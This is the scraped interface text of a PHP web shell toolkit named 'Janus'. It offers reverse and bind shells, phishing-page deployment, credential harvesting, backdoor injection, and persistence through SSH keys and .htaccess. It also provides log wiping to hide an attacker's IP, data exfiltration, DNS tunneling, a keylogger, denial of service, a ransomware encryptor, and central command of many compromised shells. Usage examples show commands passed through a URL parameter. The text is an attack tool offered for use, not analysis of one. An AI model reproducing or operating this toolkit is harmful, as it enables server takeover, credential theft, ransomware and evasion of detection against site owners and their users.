| Name | Size | Permissions | Modified | Actions |
|---|
Server Domain Reconnaissance
Automatically gather intelligence on the server's primary domain (). This includes DNS records, other websites on the same IP, and a quick scan for common subdomains.
Automated Privilege Escalation Checker
Run comprehensive checks for common privilege escalation vectors on Linux and Windows.
Internal Subnet Scanner
Scan an internal network range to discover live hosts and open ports.
Firewall Control (iptables)
View and attempt to flush firewall rules. Requires appropriate permissions.
Phishing Page Deployer
Instantly deploy a generic admin login phishing page. Credentials will be saved to /tmp/c.log on the server.
Gather detailed information about the server's configuration, including software, services, and packages.
WordPress Admin User Creator
Finds a wp-config.php file and adds a new admin user to the database.
cPanel Symlinker
Attempt to read config files of other users on shared hosting via symbolic links.
Find cPanel Credentials
Looks for cPanel credential files like ~/.lastlogin for the current user.
Connect Back (Reverse Shell)
The server connects out to your listener. Start with nc -lvnp 4444.
Listen for Connection (Bind Shell)
The server opens a port for you to connect to. Connect with nc [server_ip] 4444.
Remote Port Forwarder
Forward a port on this server to a target host and port. This is useful for accessing internal services.
Example: Listen on port 8080 here, and forward to internal database at 10.0.0.5:3306.
Note: Due to web server limitations, this forwarder will likely handle a single client connection and then terminate. Start it just before you intend to connect through it.
Port Scanner
Output:
1. Select File to Upload
2. Select Target Directories
Loading directory tree...
3. Execute Upload
Privilege Escalation Scanners
Scan results will appear here.
Scan results will appear here.
User & OS Info
Automated Credential Harvester
Recursively search for credentials, API keys, and private keys within a directory.
Content Search (grep)
Search for specific content inside files (e.g., find "DB_PASSWORD" in all PHP files).
Automatic Config Grabber
Automatically searches for and displays common configuration files.
Log Cleaner
Remove lines from a log file that contain a specific keyword (e.g., your IP address).
SSH Key Manager
Add your public SSH key to ~/.ssh/authorized_keys for persistent access.
.htaccess Persistence
Use an .htaccess file to automatically prepend a PHP file to all other PHP files in a directory. Place your backdoor code in the prepended file.
Code Injector / Backdoor Installer
Inject arbitrary code or a predefined mini-backdoor into one or more PHP files.
Injects a simple `shell_exec` backdoor into the files listed below. One file per line.
Sensitive File Finder
Scan a directory for files containing sensitive data or with sensitive names (e.g., .sql, .pem, id_rsa).
File/Directory Change Monitor
Monitor a path for a set duration and report any created, deleted, or modified files.
Data Exfiltration Packager
Select multiple files/directories below, and this tool will create a single downloadable ZIP archive.
View and edit the crontab for the current user ().
Wget (Downloader)
Denial of Services
Run an intensive process to consume CPU resources for a specific duration. This can be used to test server stability or create a denial of service.
Keylogger (Experimental)
Attempt to attach to a running process (like a shell) and capture read/write syscalls. Requires `strace` and appropriate permissions.
Monitor File Changes
Watch a directory for file changes in real-time. Detects created, deleted, and modified files.
Running Processes
View and manage running processes on the system.
| PID | User | CPU % | Memory % | Command | Actions |
|---|
Capture Network Traffic
Capture network packets using tcpdump (Linux only). Requires tcpdump and appropriate permissions.
File Encryption/Decryption
Encrypt or decrypt files using AES-256-CBC encryption.
DNS Tunneling
Send and receive data through DNS queries (covert channel).
Memory Dump Analyzer
Dump and analyze process memory (Linux only, requires gdb or /proc access).
Automated Exploit Suggester
Analyze system and suggest potential exploits based on OS, kernel, and installed software.
Password Hash Cracker
Attempt to crack password hashes using common passwords and wordlists.
Wordlist Generator
Generate wordlists from base words with patterns.
PHP Code Obfuscator
Obfuscate PHP code using various techniques to evade detection.
Notifications
Generate Lightweight Shell
Generate a lightweight PHP shell with unique identifier for easy tracking. The shell supports both GET and POST methods.
π How to Use Shell:
1. GET Method (URL):
http://yoursite.com/shell.php?janus=<command>Examples:
http://yoursite.com/shell.php?janus=whoamihttp://yoursite.com/shell.php?janus=ls -lahttp://yoursite.com/shell.php?janus=id
2. POST Method:
Send POST request with parameter janus=<command>
Notes:
- Default password:
janus(if using a different password, change the parameter name) - For commands with spaces, use URL encoding:
%20for space - Command chaining: use
;or&&
Find Deployed Shells
Automatically search for all .php files containing the JANUS_SHELL_IDENTIFIER. This will find all shells generated by this tool.
Click "Search" to find all deployed shells
Dump Database Column
Extract all data from a specific column in a database table.
Dump Entire Database
Generate SQL dump of entire database with all tables and data.
Open BaseDir Bypass Methods
Generate PHP code to bypass open_basedir restrictions.
Send Fake Email
Send email with custom headers and spoofed sender address.
Decode WHMCS Encoded Strings
Decode base64, hex, or gzinflate encoded strings commonly used in WHMCS.
File Selection
Select files to encrypt using HADES multi-layer encryption. Files will be encrypted with .hades extension.
Method 1: Select Files Directly
Click "Browse Files" to select files
Method 2: Encrypt by Extension
Encryption Settings
π HADES Encryption: 13-layer encryption with AES-256-CBC (3x), XOR obfuscation, compression, and multiple encoding layers.
Decrypt File
Decrypt a file that was encrypted by HADES Ransomware Generator.
Process Hiding
Attempt to hide PHP processes from system monitoring tools.
Log Evasion
Disable logging and clear command history to avoid detection.
Clean Log Files
Remove specific keywords/IPs from multiple log files simultaneously. Automatically detects common log locations if not specified.
Backup Shell to Multiple Locations
Create backups of your shell in multiple hidden locations for persistence. Automatically detects optimal backup locations if not specified.
Command & Control Server
Communicate with your C2 server for centralized command execution and data exfiltration.
Test WAF Bypass Methods
Test various techniques to bypass Web Application Firewalls (Cloudflare, ModSecurity, etc.).
System Information Gathering
Gather comprehensive system information for post-exploitation analysis.
Register New Shell
Register this shell, local shell, or remote shell (different domain) for centralized management.
Registered Shells
View all registered shell instances (local and remote).
Broadcast Command
Execute a command on all registered active shells simultaneously (local and remote).
Install Persistence Mechanisms
Install multiple persistence mechanisms to ensure shell recovery after deletion.
Create .htaccess Protection
Generate .htaccess file untuk melindungi shell dari akses langsung tanpa token. File .htaccess akan dibuat di direktori shell.
β’ .htaccess akan dibuat di direktori yang sama dengan shell
β’ Protection akan memblokir akses GET langsung tanpa token
β’ POST requests tetap diizinkan untuk komunikasi shell
β’ Secret token akan disimpan di file .janus_secret_*
β’ File .htaccess TIDAK dibuat otomatis saat shell dibuka
β’ Anda harus mengklik tombol "Generate" untuk membuatnya